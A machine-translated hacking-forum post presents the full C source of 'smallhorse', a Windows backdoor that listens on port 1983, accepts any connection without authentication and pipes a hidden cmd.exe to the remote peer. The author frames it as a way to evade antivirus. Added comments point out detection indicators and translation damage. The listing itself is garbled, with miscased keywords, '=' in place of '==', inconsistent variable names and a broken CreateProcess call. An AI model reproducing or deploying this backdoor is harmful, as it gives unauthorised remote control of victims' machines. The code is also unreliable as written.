A simple shell Backdoor

Source: Internet
Author: User

A simple shell Backdoor

Author: Pony/smallhorse [e.s. t VIP] (it doesn't matter if you do not write this e.s. t VIP)
Source: evil baboons China

Recently, I was bored and thought about writing a simple shell backdoor. At the same time, anti-virus software K can avoid intrusion. Refer to the T-CMD source code and the previous article related to anti-black. I learned a lot.
The program is very simple. After running the program, port 1983 is opened by default. You can also set the port and wait for the client to connect. You can use NC for the connection. I also wanted to design a service to enable it to run automatically after it is turned on. Due to time issues, it will be improved later.
Usage: smallhorse [-P port]. The -p parameter is used to set your own port.

The following is the source program, which is posted here so that we can learn and make progress together. I hope that you will not hesitate to give me advice. Here, I would like to thank you.
QQ: 11189658 E-MAIL: horse_man@163.com

Compiled in VC ++ 6.0 win2003

# Include <winsock2.h>
# Include <stdio. h>
# Pragma comment (Lib, "ws2_32.lib ")
// Default TCP port for the listener. main() replaces it with the value given
// on the command line, and opendoor() passes it to htons() before binding.
// NOTE(review): the identifier case differs between uses on this page
// ("Port" here, "port" in opendoor); this looks like damage from the page's
// machine translation rather than two separate variables. Confirm against the
// original listing.
Int Port = 1983;
// Forward declaration of the per-connection worker that opendoor() starts
// through createthread.
DWORD winapi clientthread (lpvoid lpparam );
// Prints the fixed usage banner to standard output. Takes no arguments and
// returns nothing.
//
// The banner text ("smallhorse", "shell v0.1", "default port is 1983") is
// compiled into the program as constant strings, so it can serve as a static
// indicator when triaging an unknown executable.
// NOTE(review): "/N" and "// n" inside the literals look like "\n" escapes
// mangled by the page's translation; the bytes in a real sample may differ.
// Verify against a sample before building a signature from these strings.
Void help ()
{Printf ("/*********************************** * *** // n ");
Printf ("| this smallhorse's first choice shell v0.1 |/N ");
Printf ("| thanks for using it! |/N ");
Printf ("| smallhorse [e.s. T] VIP 2005.03 |/N ");
Printf ("| ************************************ * ** |/N ");
Printf ("| usage: smallhorse [-P port] |/N ");
Printf ("| Port: port number to listen on |/N ");
Printf ("| default port is 1983 |/N ");
Printf ("//*********************************** * *** // n ");
Return;
}

// Opens a TCP listener on the configured port and hands every accepted
// connection to clientthread(). Returns silently on any setup failure.
//
// What the visible code establishes, from a defender's point of view:
//  - The socket is bound to inaddr_any, so it listens on every local
//    interface, not only loopback. Default-deny inbound filtering on the host
//    or network keeps the port unreachable from outside.
//  - Nothing between accept() and createthread() checks a password, key or
//    source address: any peer that can reach the port is served.
//  - The greeting is sent as-is over the TCP socket; no encryption is set up
//    here, so the session is readable by network monitoring.
//  - No closesocket call appears on any path, and the Wsacleanup() after the
//    loop is never reached because the loop is only left through Return.
// NOTE(review): the single "=" in the comparisons below (and "! =") is most
// likely "==" / "!=" damaged by the page's translation. Confirm against the
// original listing.
Void opendoor ()
{
// Initialize Winsock, requesting version 2.2.
Wsadata;
Socket m_socket, acceptclient;
Sockaddr_in service, client;
Int clientsize, I = 0;
Int iresult = wsastartup (makeword (2, 2), & wsadata );
If (iresult! = No_error)
Return;

// Create an IPv4 TCP stream socket.

M_socket = socket (af_inet, sock_stream, ipproto_tcp );
If (m_socket = socket_error)
Return;
// Listen address: all interfaces (inaddr_any), port taken from the global.
Service. sin_family = af_inet;
Service. sin_addr.s_addr = htonl (inaddr_any );
Service. sin_port = htons (port );

If (BIND (m_socket, (sockaddr *) & service, sizeof (Service) = socket_error)
Return; // specify

If (Listen (m_socket, 5) = socket_error)
Return; // a maximum of five listeners can be queued.
// Console message that also reveals the chosen port to anyone watching the
// process's standard output.
Printf ("/nsmallhorse listen on port: % d... ^ * ^/N", Port );
Clientsize = sizeof (client );
// Accept loop: one iteration per inbound connection.
While (1)
{
Acceptclient = accept (m_socket, (sockaddr *) & client, & clientsize );
If (acceptclient = socket_error)
Return; // accept the connection
Printf ("Client Connected./N ");
// Fixed greeting sent to every peer immediately after accept; a constant
// first payload like this is a usable network-side indicator.
Char * sendbuf = "/********************************** * *** // n/tthanks for using... /n/tsmallhorse's writable shell! /N/tgood luck! /N //************************************ * ** // n/n ";
Send (acceptclient, sendbuf, strlen (sendbuf), 0 );

// The worker receives the ADDRESS of the local acceptclient, which the next
// accept() overwrites. Presumably the one-second Sleep below is there to let
// the worker copy the value first (TODO confirm).
If (createthread (null, 0, clientthread, (lpvoid) & acceptclient, 0, null) = NULL)
Printf ("create thread error! /N ");
Sleep (1000 );
}
Wsacleanup ();
Return;
}
// Per-connection worker: starts cmd.exe with its standard handles redirected
// to two anonymous pipes and relays bytes between those pipes and the socket.
//
// lpparam: pointer to the accepted socket, as passed by opendoor().
// Returns 0 when the relay loop ends.
//
// Behaviour a defender can observe, as established by the code below:
//  - cmd.exe is launched from the system directory with a hidden window
//    (sw_hide) and with stdin/stdout/stderr replaced by pipe handles
//    (startf_usestdhandles). A hidden cmd.exe whose parent also owns a
//    network socket is a strong signal for process-creation monitoring.
//  - The pipe handles are created inheritable (binherithandle = true) so the
//    child process can use them.
//  - Bytes are relayed unmodified in both directions; no authentication or
//    encryption step appears anywhere in this function.
//  - No pipe handle, process handle or socket is closed in the visible code.
DWORD winapi clientthread (lpvoid lpparam)
{Int ret;
Char Buf [1024];
Handle rpipe, wpipe, wfile, rfile;
// Copy the socket value out of the caller's variable.
Socket acceptclient = (socket) * (socket *) lpparam;

// Security attributes that mark the pipe handles as inheritable.
Security_attributes SA;
SA. nlength = sizeof (SA );
SA. binherithandle = true;
SA. lpsecuritydescriptor = NULL;

// rpipe/rfile: the child writes its output to rfile, this thread reads rpipe.
// wfile/wpipe: this thread writes to wpipe, the child reads wfile as stdin.
// The result of the first call is overwritten by the second and neither
// result is checked.
Ret = createpipe (& rpipe, & rfile, & SA, 0 );
Ret = createpipe (& wfile, & wpipe, & SA, 0); // create two pipelines for receiving commands and Displaying results respectively.

// Start from this process's own startup info, then override the window
// state and the three standard handles.
Startupinfo startinfo;
Getstartupinfo (& startinfo );
Startinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Startinfo. hstdinput = wfile;
Startinfo. hstderror = startinfo. hstdoutput = rfile;
Startinfo. wshowwindow = sw_hide;

// Build the interpreter path: system directory followed by cmd.exe.
// NOTE(review): the buffer is spelled differently on each of the next lines
// ("character line", "cmdline", "using line"), and the CreateProcess argument
// list is visibly incomplete; this is damage from the page's translation, not
// the original code.
Char character line [max_path];
Getsystemdirectory (cmdline, max_path );
Strcat (cmdline, ("// cmd.exe "));

Process_information proinfo;
// The result is stored but not checked before the relay loop starts.
Ret = CreateProcess (using line, null, & startinfo, & proinfo );
Unsigned long byterec;
// Relay loop: every 100 ms, forward pending child output to the peer;
// when there is none, wait for the next input from the peer.
While (1)
{
Sleep (100 );
// Check for pending child output without consuming it.
Peeknamedpipe (rpipe, Buf, 1024, & byterec, 0, 0 );
If (byterec ){
// Child produced output: read it and send it to the peer.
Ret = readfile (rpipe, Buf, byterec, & byterec, 0 );
If (! RET)
Break;
Ret = Send (acceptclient, Buf, byterec, 0 );
If (Ret <= 0)
Break;
}
Else {
// No pending output: receive up to 1024 bytes from the peer and write them
// to the child's stdin.
Byterec = Recv (acceptclient, Buf, 1024,0 );
If (byterec <= 0)
Break;
Ret = writefile (wpipe, Buf, byterec, & byterec, 0 );
If (! RET)
Break;
}
}
Return 0;
}
// Entry point: prints the banner, optionally takes the listening port from
// the command line, then starts the listener.
//
// argv[1] is compared with the port option and argv[2] is converted with
// atoi; the converted value is not range-checked before it is stored in the
// global port variable. With any other argument count the default (1983) is
// kept, so the command line of a running instance shows whether a
// non-default port was chosen.
// NOTE(review): "argc = 3" and the option literal "-P " (upper case, trailing
// space) look like translation damage; the prose above the listing refers to
// a "-p parameter". Confirm against the original listing.
Int main (INT argc, char * argv [])
{
Help ();
If (argc = 3)
If (! Strcmp (argv [1], "-P "))
Port = atoi (argv [2]);
Opendoor ();
Return 0;
}
